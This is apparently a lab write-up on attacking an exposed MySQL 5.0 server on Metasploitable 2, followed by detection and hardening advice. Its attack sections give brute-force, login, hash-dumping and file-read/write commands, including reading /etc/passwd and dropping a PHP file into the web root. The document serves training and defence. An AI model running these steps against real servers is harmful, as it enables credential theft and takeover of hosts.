01
Vulnerability Overview
MySQL 5.0.51a on Metasploitable 2 accepts logins with weak or default credentials; the root account in this lab image has no password at all. Once authenticated, an attacker can enumerate databases, dump the account hashes in mysql.user, and, if the account holds the FILE privilege, read and write files on the host through LOAD_FILE() and SELECT ... INTO OUTFILE. The writes happen as the mysqld OS user, which is what makes dropping a web shell into the web root possible.
Default or weak MySQL credentials are a common misconfiguration, and they become a host compromise rather than a database compromise as soon as the database is reachable over the network and the account can touch the file system.
02
Service Detection
```bash
nmap -sV -v -p 3306 <target-ip>
```
On Metasploitable 2 the version banner comes back as `MySQL 5.0.51a-3ubuntu5`, which confirms the service is exposed on the network interface rather than bound to localhost.
03
Credential Brute Force
Use Hydra to brute force MySQL credentials:
```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<target-ip>
```
Common weak credentials are root/root and root/toor, but try the trivial cases before burning a wordlist: adding `-e ns` makes Hydra also attempt an empty password and the username as the password. On Metasploitable 2 the root account has an empty password, so that single check succeeds immediately.
04
Database Access & Enumeration
Connect to MySQL and enumerate databases. When prompted for the password, press Enter (the lab root account has none; `-p` can be dropped entirely):
```bash
mysql -h <target-ip> -u root -p
```
```sql
SHOW DATABASES;
USE mysql;
SELECT user,password FROM user;
```
The `password` column holds 41-character `*...` hashes (SHA1-based, hashcat mode 300); an empty value means the account logs in without a password.
05
File Write Exploitation
Use LOAD_FILE and INTO OUTFILE for file operations. Both require the FILE privilege; without it LOAD_FILE() silently returns NULL and INTO OUTFILE fails with an access-denied error. Files are read and written as the mysqld OS user, INTO OUTFILE refuses to overwrite an existing file, and in MySQL 5.0 `secure_file_priv` is empty by default, so there is no directory restriction:
```sql
SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php phpinfo(); ?>' INTO OUTFILE '/var/www/phpinfo.php';
```
06
Automated Exploitation — Metasploit
```bash
msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS <target-ip>
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_users.txt
run
```
The module also honours the standard `BLANK_PASSWORDS` option; setting it to `true` tries the empty password that this lab's root account actually has, independent of whatever is in PASS_FILE.
07
Results & Impact
Outcome
- Brute forced (or simply guessed the empty) MySQL root credentials
- Authenticated as the MySQL root user, with the FILE privilege
- Extracted account hashes from the mysql.user table
- Used INTO OUTFILE to write a web shell into /var/www
- Code execution as the web server user via that shell, with further local privilege escalation possible from there
Detection & Mitigation (Blue Team)
- Set a strong MySQL root password and remove anonymous and remote root accounts from mysql.user
- Bind MySQL to localhost (`bind-address = 127.0.0.1` under `[mysqld]` in my.cnf) when nothing remote needs it
- Revoke the FILE privilege from every non-administrative account and set `secure_file_priv` to a dedicated directory so LOAD_FILE/OUTFILE cannot reach the web root
- Firewall port 3306 from untrusted networks as a second layer, independent of the bind address
- Enable the general query log and alert on LOAD_FILE, INTO OUTFILE and bursts of "Access denied" connects from a single source
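The audit and hardening statements behind the first three items above, as an added example that is not part of the original write-up. They are meant to be run locally on the server as an administrative user; the `'webapp'@'localhost'` account and the passphrase placeholder are assumptions standing in for whatever accounts exist on a real host.

```sql
-- Added audit/hardening statements (not from the original write-up).
-- Run as an administrative user on the server itself. 'webapp'@'localhost'
-- and the passphrase placeholder are stand-ins for real accounts/values.

-- Audit: passwordless accounts, anonymous accounts, and root reachable
-- from anywhere but localhost. Each row is a finding.
SELECT user, host FROM mysql.user WHERE password = '' OR password IS NULL;
SELECT user, host FROM mysql.user WHERE user = '';
SELECT user, host FROM mysql.user WHERE user = 'root' AND host <> 'localhost';

-- Audit: every account that can read or write host files via the server.
SELECT user, host, File_priv FROM mysql.user WHERE File_priv = 'Y';

-- Fix: real root password, and no anonymous or remote root entries.
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('<long-random-passphrase>');
DELETE FROM mysql.user WHERE user = '';
DELETE FROM mysql.user WHERE user = 'root' AND host <> 'localhost';

-- Fix: FILE is a global privilege; take it away from application accounts.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';

-- Re-read the grant tables after editing mysql.user directly.
FLUSH PRIVILEGES;
```

Re-run the four audit queries afterwards; all should return empty except the FILE_priv one, which should list only administrative accounts. `bind-address`, `secure_file_priv` and the general log (`log = /var/log/mysql/mysql.log` in 5.0) are server settings, not grants, so they go under `[mysqld]` in my.cnf and take effect on restart.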